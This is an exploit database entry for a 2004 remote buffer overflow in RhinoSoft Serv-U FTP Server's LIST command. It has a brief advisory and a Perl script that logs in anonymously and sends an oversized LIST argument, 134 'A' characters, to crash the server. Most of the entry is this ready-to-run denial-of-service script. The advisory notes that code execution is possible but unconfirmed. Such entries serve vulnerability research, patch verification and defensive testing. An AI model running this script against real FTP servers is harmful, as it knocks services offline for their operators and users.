RhinoSoft Serv-U FTP Server 3.x4.x5.0 - LIST Buffer Overflow

2004-04-20T00:00:00
ID EXPLOITPACK:9938E00BB3B5A9E747B66D349DC253CB
Type exploitpack
Reporter storm
Modified 2004-04-20T00:00:00

Description

RhinoSoft Serv-U FTP Server 3.x4.x5.0 - LIST Buffer Overflow

                                        
                                            source: https://www.securityfocus.com/bid/10181/info

Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed.

#!/usr/bin/perl

use IO::Socket;

$host = "www.example.com";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;